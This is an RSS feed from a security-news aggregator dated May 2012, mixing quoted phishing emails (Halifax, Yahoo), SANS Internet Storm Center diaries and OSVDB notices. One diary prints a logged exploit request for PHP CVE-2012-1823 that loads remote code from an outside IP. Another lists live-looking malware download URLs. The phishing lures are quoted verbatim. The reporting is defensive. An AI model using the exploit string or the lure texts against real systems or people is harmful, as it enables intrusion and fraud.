<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><!-- generator="Best Security Tips Virus and Spyware News" --><rss version="0.91">
    <channel>
        <title>24/7 Live Malware Mix</title>
        <description>24/7 Live Malware Mix containing Virus Newly Discovered by Kaspersky, Sophos, F-Secure, CA ,Virus Bulletin, Open Source Vulnerability Database and SecurityFocus Vulnerabilities .</description>
        <link>http://www.bestsecuritytips.com/modules/planet/index.php</link>
        <lastBuildDate>Mon, 28 May 2012 10:26:42 +1800</lastBuildDate>
        <generator>Best Security Tips Virus and Spyware News</generator>
        <image><link>http://www.bestsecuritytips.com</link><url>http://www.bestsecuritytips.com/themes/7dana-Xred/images/bst.gif</url><title>Best Security Tips</title></image>
        <language>en</language>
        <managingEditor>contact at bestsecuritytips dot com</managingEditor>
        <webMaster>contact at bestsecuritytips dot com</webMaster>
        <category>News</category>
        <atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/xml" href="http://feeds.feedburner.com/VirusAndSpywareNews" /><feedburner:info xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" uri="virusandspywarenews" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><feedburner:emailServiceId xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0">VirusAndSpywareNews</feedburner:emailServiceId><feedburner:feedburnerHostname xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0">http://feedburner.google.com</feedburner:feedburnerHostname><item>
            <title>New Security Precautions. - Halifax UK</title>
            <link>http://www.bestsecuritytips.com/modules/planet/view.article.php?50716</link>
            <description>DEAR VALUED CUSTOMER, Security machinery at Halifax Bank has been upgraded to provide customers with a faster, easier and more efficient online experience. All customers are required to update their account information. Click here to Login to complete the update process. Note: Failure to update your information will lead to online service suspension. Yours sincerely, Online Customer Service Halifax UK ...&lt;br /&gt;Source: http://www.millersmiles.co.uk/email/new-security-precautions-halifax-uk&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?a=lBy-Xf8HJWk:V0BMmK2oQ3I:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?a=lBy-Xf8HJWk:V0BMmK2oQ3I:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?i=lBy-Xf8HJWk:V0BMmK2oQ3I:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?a=lBy-Xf8HJWk:V0BMmK2oQ3I:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?i=lBy-Xf8HJWk:V0BMmK2oQ3I:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description>
            <pubDate>Mon, 28 May 2012 12:00:03 +1800</pubDate>
        </item>
        <item>
            <title>Ridiculous Deals from Groupon! - PERSONALIZED DEALS</title>
            <link>http://www.bestsecuritytips.com/modules/planet/view.article.php?50715</link>
            <description>Ridiculous Deals from Groupon! This email was sent to &lt;a href="mailto:benyblom@gmail.com."&gt;benyblom@gmail.com.&lt;/a&gt; If you no longer wish to receive our emails, click here to unsubscribe ...&lt;br /&gt;Source: http://www.millersmiles.co.uk/email/ridiculous-deals-from-groupon-personalized-deals&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?a=kLn6DPrXvGY:eZ60M8DqRaQ:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?a=kLn6DPrXvGY:eZ60M8DqRaQ:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?i=kLn6DPrXvGY:eZ60M8DqRaQ:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?a=kLn6DPrXvGY:eZ60M8DqRaQ:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?i=kLn6DPrXvGY:eZ60M8DqRaQ:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description>
            <pubDate>Mon, 28 May 2012 09:00:02 +1800</pubDate>
        </item>
        <item>
            <title>PHP vulnerability CVE-2012-1823 being exploited in the wild, (Sun, May 27th)</title>
            <link>http://www.bestsecuritytips.com/modules/planet/view.article.php?50714</link>
            <description>&lt;br /&gt;&lt;br /&gt;Reader Bob detected in his webserver the following string in the access log of his web server:&lt;br /&gt;&lt;br /&gt;bas1-richmondhill34-1177669777.dsl.bell.ca - - [24/May/2012:12:17:49 -0700] GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.82%2Finfo3.txt HTTP/1.1 404 2890 -  .NET CLR 1.0.2914)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This string is an attempt to exploit the PHP vulnerability CVE-2012-1823 with the remote execution variant. Let's see what means each of the options invoked:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;    safe_mode=off: PHP disables the capacity of checking if the if the owner of the current script matches the owner of the file to be operated by a file funcionality. This directive has been deprecated on PHP 5.3.0 tree and removed on PHP 5.4.0 tree.&lt;br /&gt;&lt;br /&gt;    disable_functions=null: No function is disabled from the whole amount contained within PHP. This means that insecure functions are available like proc_open, exec, passthru, curl_exec, system, popen, curl_multi_exec and shell_exec. For more information on this functions, please check the PHP manual.&lt;br /&gt;&lt;br /&gt;    allow_url_fopen=on: This directive allows PHP to open files located in http or ftp locations and operate them as a normal file descriptor.&lt;br /&gt;&lt;br /&gt;    allow_url_include=on:This directive allows to include additional PHP code located in a http or ftp URL into the PHP file before being processed and executed.&lt;br /&gt;&lt;br /&gt;    auto_prepend_file=http://81.17.24.82/info3.php: This directive includes the PHP code located in &lt;a href="http://81.17.24.82/info3.php" target="_blank"&gt;http://81.17.24.82/info3.php&lt;/a&gt; and execute it before the code inside index.php.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;You can prevent this by using the latest stable PHP version located at the downloads page. If you are using windows, please be careful because you can be affected by the CVE-2012-2376. For more information regarding remediation on this vulnerability, please check my previous diary about it.&lt;br /&gt;&lt;br /&gt;Have you seen such logs in your access.log webserver file? We want to hear about it. Let us know!&lt;br /&gt;&lt;br /&gt;Manuel Humberto Santander Pelez&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;SANS Internet Storm Center - Handler&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Twitter:@manuelsantander&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Web:&lt;a href="http://manuel.santander.name" target="_blank"&gt;http://manuel.santander.name&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;e-mail:msantand at isc dot sans dot org&lt;br /&gt; &lt;br /&gt; (c) SANS Internet Storm Center. &lt;a href="http://isc.sans.edu" target="_blank"&gt;http://isc.sans.edu&lt;/a&gt; Creative Commons Attribution-Noncommercial 3.0 United States License.&lt;br /&gt;Source: http://isc.sans.edu/diary.html?storyid=13312&amp;rss&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?a=aejwW8hgfcU:sUlCwPRZ4BI:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?a=aejwW8hgfcU:sUlCwPRZ4BI:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?i=aejwW8hgfcU:sUlCwPRZ4BI:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?a=aejwW8hgfcU:sUlCwPRZ4BI:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?i=aejwW8hgfcU:sUlCwPRZ4BI:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description>
            <pubDate>Sun, 27 May 2012 22:48:35 +1800</pubDate>
        </item>
        <item>
            <title>This feed is no more! Please see osvdb.org for more info.</title>
            <link>http://www.bestsecuritytips.com/modules/planet/view.article.php?50713</link>
            <description>OSVDB has completed a major redesign, and this feed has been replaced with more customizable feeds. Please visit osvdb.org for more information on how to use our new services.&lt;br /&gt;Source: http://osvdb.org/&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?a=Zq2EIjLYwUE:r3gYg2uUAH0:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?a=Zq2EIjLYwUE:r3gYg2uUAH0:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?i=Zq2EIjLYwUE:r3gYg2uUAH0:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?a=Zq2EIjLYwUE:r3gYg2uUAH0:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?i=Zq2EIjLYwUE:r3gYg2uUAH0:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description>
            <pubDate>Sun, 27 May 2012 14:02:59 +1800</pubDate>
        </item>
        <item>
            <title>Halifax - Account Flagged - halifax-online.co.uk</title>
            <link>http://www.bestsecuritytips.com/modules/planet/view.article.php?50712</link>
            <description>Account Review Notification Your Account Has Been Flagged As One of The Numerous Accounts That Needs To Be Reviewed.  The main reason for this action are * Billing / Payment Issues  * Abuse and Terms of Use Issues  WE STRONGLY SUGGEST, THAT YOU TRY TO DO THE FOLLOWING: * Review your account Once you've done this your account will be remove from the flagged account automatically. Customer Advisory Halifax ...&lt;br /&gt;Source: http://www.millersmiles.co.uk/email/halifax-account-flagged-halifaxonlinecouk&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?a=OezVboyTFMc:a0RJAleRRFo:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?a=OezVboyTFMc:a0RJAleRRFo:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?i=OezVboyTFMc:a0RJAleRRFo:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?a=OezVboyTFMc:a0RJAleRRFo:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?i=OezVboyTFMc:a0RJAleRRFo:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description>
            <pubDate>Sun, 27 May 2012 02:00:02 +1800</pubDate>
        </item>
        <item>
            <title>New e-mail scam targeting Colombian Internet users: This time claiming to be from the Transport ...</title>
            <link>http://www.bestsecuritytips.com/modules/planet/view.article.php?50711</link>
            <description>&lt;br /&gt;&lt;br /&gt;Scams keep coming! This time there were many uses from all across the country targeted by this e-mail scam claiming to be a notice of traffic ticket from the Transport Authority.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Two links were provided in the e-mail: &lt;a href="http://www.mcc-instrumentation.com/videos/Ver_Documento_ID_23452345212234_VER_Cod_2345234723497.html" target="_blank"&gt;http://www.mcc-instrumentation.com/videos/Ver_Documento_ID_23452345212234_VER_Cod_2345234723497.html&lt;/a&gt; and &lt;a href="http://www.la-cloture-electrique.fr/upload/Ver_Documento_ID_23472893475987980798072344_VER_Cod_2234523345234723497.html." target="_blank"&gt;http://www.la-cloture-electrique.fr/upload/Ver_Documento_ID_23472893475987980798072344_VER_Cod_2234523345234723497.html.&lt;/a&gt; Both of them redirects to the file Aviso-Multas_DOC.exe, with MD5 d554f70ce28470350269d8e6778127e3. Once executed, it downloads the following files:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;    &lt;br /&gt;&lt;br /&gt;        &lt;br /&gt;&lt;br /&gt;            File&lt;br /&gt;&lt;br /&gt;            MD5&lt;br /&gt;&lt;br /&gt;        &lt;br /&gt;&lt;br /&gt;        &lt;br /&gt;&lt;br /&gt;            atu.exe&lt;br /&gt;&lt;br /&gt;            1466d43e8ae62af74a83eb81094c7c25&lt;br /&gt;&lt;br /&gt;        &lt;br /&gt;&lt;br /&gt;        &lt;br /&gt;&lt;br /&gt;            ky.exe&lt;br /&gt;&lt;br /&gt;            974f4ceaca680fe4572a0e050fc851db&lt;br /&gt;&lt;br /&gt;        &lt;br /&gt;&lt;br /&gt;        &lt;br /&gt;&lt;br /&gt;            wrm.exe&lt;br /&gt;&lt;br /&gt;            e63c7844a75df064d78f1894e6f673bb&lt;br /&gt;&lt;br /&gt;        &lt;br /&gt;&lt;br /&gt;    &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;The exe files read all the TCP/IP registry parameters. After that, it connects to some servers to report to some kind of a botnet:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;One of the reports seems to be sent by mail, because the php script where the program reports gets a warning:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;As of today, there are other servers that have removed the offending PHP scripts sending a 404 error to the program. No further action is taken by the program and it becomes resident by creating entries on HKLM\Software\Microsoft\Windows\Currentversion\Run&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Have you seen this kind of packets in your network? Let us know!&lt;br /&gt;&lt;br /&gt;Manuel Humberto Santander Pelez&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;SANS Internet Storm Center - Handler&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Twitter:@manuelsantander&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Web:&lt;a href="http://manuel.santander.name" target="_blank"&gt;http://manuel.santander.name&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;e-mail:msantand at isc dot sans dot org&lt;br /&gt; &lt;br /&gt; (c) SANS Internet Storm Center. &lt;a href="http://isc.sans.edu" target="_blank"&gt;http://isc.sans.edu&lt;/a&gt; Creative Commons Attribution-Noncommercial 3.0 United States License.&lt;br /&gt;Source: http://isc.sans.edu/diary.html?storyid=13309&amp;rss&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?a=qWas159z1FE:fCvxMntgtig:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?a=qWas159z1FE:fCvxMntgtig:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?i=qWas159z1FE:fCvxMntgtig:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?a=qWas159z1FE:fCvxMntgtig:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?i=qWas159z1FE:fCvxMntgtig:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description>
            <pubDate>Sun, 27 May 2012 01:34:09 +1800</pubDate>
        </item>
        <item>
            <title>This feed is no more! Please see osvdb.org for more info.</title>
            <link>http://www.bestsecuritytips.com/modules/planet/view.article.php?50710</link>
            <description>OSVDB has completed a major redesign, and this feed has been replaced with more customizable feeds. Please visit osvdb.org for more information on how to use our new services.&lt;br /&gt;Source: http://osvdb.org/&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?a=PbUpGV0Uuec:v4EJctfxxrU:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?a=PbUpGV0Uuec:v4EJctfxxrU:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?i=PbUpGV0Uuec:v4EJctfxxrU:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?a=PbUpGV0Uuec:v4EJctfxxrU:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?i=PbUpGV0Uuec:v4EJctfxxrU:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description>
            <pubDate>Sat, 26 May 2012 07:32:01 +1800</pubDate>
        </item>
        <item>
            <title>Update  !!!! - Yahoo Member Service</title>
            <link>http://www.bestsecuritytips.com/modules/planet/view.article.php?50709</link>
            <description>Dear Customer, Access to e-mail is about to expire, We recommend that you upgrade your account to avoid the suspension. Please click on the link below to update your account. NlrAxvxzAzxvxmNODWOvxq0568F2mGbrsvxwvUFiM7N1FGUD34iEmTrmw343mnrs3sr0esr1W43CtQsrNVUbMiGSsrsuKXHH9Zuseranddone=yahoomail.php Thank You. Yahoo 2012 .  ...&lt;br /&gt;Source: http://www.millersmiles.co.uk/email/update--yahoo-member-servicenoreplyyahoocom&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?a=99aUI79-ETc:OfXH7k5JQrQ:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?a=99aUI79-ETc:OfXH7k5JQrQ:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?i=99aUI79-ETc:OfXH7k5JQrQ:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?a=99aUI79-ETc:OfXH7k5JQrQ:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?i=99aUI79-ETc:OfXH7k5JQrQ:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description>
            <pubDate>Sat, 26 May 2012 12:00:01 +1800</pubDate>
        </item>
        <item>
            <title>VMware vMA Security Advisory VMSA-2012-0010 - http://www.vmware. ...</title>
            <link>http://www.bestsecuritytips.com/modules/planet/view.article.php?50708</link>
            <description>-----------  Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu&lt;br /&gt; &lt;br /&gt; (c) SANS Internet Storm Center. &lt;a href="http://isc.sans.edu" target="_blank"&gt;http://isc.sans.edu&lt;/a&gt; Creative Commons Attribution-Noncommercial 3.0 United States License.&lt;br /&gt;Source: http://isc.sans.edu/diary.html?storyid=13306&amp;rss&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?a=mvEOeQZimI0:R6Kg4Oby4Mk:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?a=mvEOeQZimI0:R6Kg4Oby4Mk:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?i=mvEOeQZimI0:R6Kg4Oby4Mk:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?a=mvEOeQZimI0:R6Kg4Oby4Mk:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?i=mvEOeQZimI0:R6Kg4Oby4Mk:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description>
            <pubDate>Fri, 25 May 2012 12:52:51 +1800</pubDate>
        </item>
        <item>
            <title>Technical Analysis of Flash Player CVE-2012-0779, (Fri, May 25th)</title>
            <link>http://www.bestsecuritytips.com/modules/planet/view.article.php?50707</link>
            <description>Microsoft Malware Protection Center (MMPC) posted a technical analysis of malware targeting an Adobe Flash Player (CVE-2012-0779) vulnerability to which Adobe released a critical patch update earlier this month (diary posted here). The technical analysis shows the process how the infection occurs when a malicious document is open. The technical analysis is posted here. Get the latest version of Flash Player here (Flash Player 11.2.202.233 and earlier is vulnerable).&lt;br /&gt;&lt;br /&gt;[1] &lt;a href="http://isc.sans.edu/diary/Adobe+Security+Flash+Update/13129" target="_blank"&gt;http://isc.sans.edu/diary/Adobe+Security+Flash+Update/13129&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;[2] &lt;a href="http://blogs.technet.com/b/mmpc/archive/2012/05/24/a-technical-analysis-of-adobe-flash-player-cve-2012-0779-vulnerability.aspx" target="_blank"&gt;http://blogs.technet.com/b/mmpc/archive/2012/05/24/a-technical-analysis-of-adobe-flash-player-cve-2012-0779-vulnerability.aspx&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;[3] &lt;a href="http://get.adobe.com/flashplayer/" target="_blank"&gt;http://get.adobe.com/flashplayer/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;-----------&lt;br /&gt;&lt;br /&gt;Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu&lt;br /&gt; &lt;br /&gt; (c) SANS Internet Storm Center. &lt;a href="http://isc.sans.edu" target="_blank"&gt;http://isc.sans.edu&lt;/a&gt; Creative Commons Attribution-Noncommercial 3.0 United States License.&lt;br /&gt;Source: http://isc.sans.edu/diary.html?storyid=13303&amp;rss&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?a=z39M6dcH1us:zGLRV21EMH0:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?a=z39M6dcH1us:zGLRV21EMH0:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?i=z39M6dcH1us:zGLRV21EMH0:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?a=z39M6dcH1us:zGLRV21EMH0:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/VirusAndSpywareNews?i=z39M6dcH1us:zGLRV21EMH0:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description>
            <pubDate>Fri, 25 May 2012 09:39:37 +1800</pubDate>
        </item>
    </channel>
</rss>

